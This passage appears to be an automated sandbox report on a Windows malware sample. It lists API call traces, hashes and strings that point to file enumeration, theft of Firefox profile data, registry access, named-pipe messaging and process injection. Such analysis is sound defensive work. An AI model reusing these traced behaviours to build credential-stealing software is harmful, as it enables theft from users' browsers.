  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
